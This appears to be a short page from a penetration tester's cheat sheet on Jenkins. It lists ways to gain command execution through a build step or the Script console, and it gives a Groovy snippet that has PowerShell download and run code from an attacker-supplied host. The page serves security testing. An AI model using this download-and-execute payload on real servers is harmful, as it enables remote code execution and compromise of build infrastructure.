> For the complete documentation index, see [llms.txt](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/services/misc/jenkins.md).

# Jenkins

> Jenkins is a free and open source automation server. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Jenkins_\(software\))

## Command execution

1. Create new project
2. Build -> execute shell

or

1. Manage jenkins
2. Script console

```groovy
cmd = """ powershell "IEX(NewObject Net.WebClient).downloadString('http://<ip>/file')" """
println cmd.execute().text
```
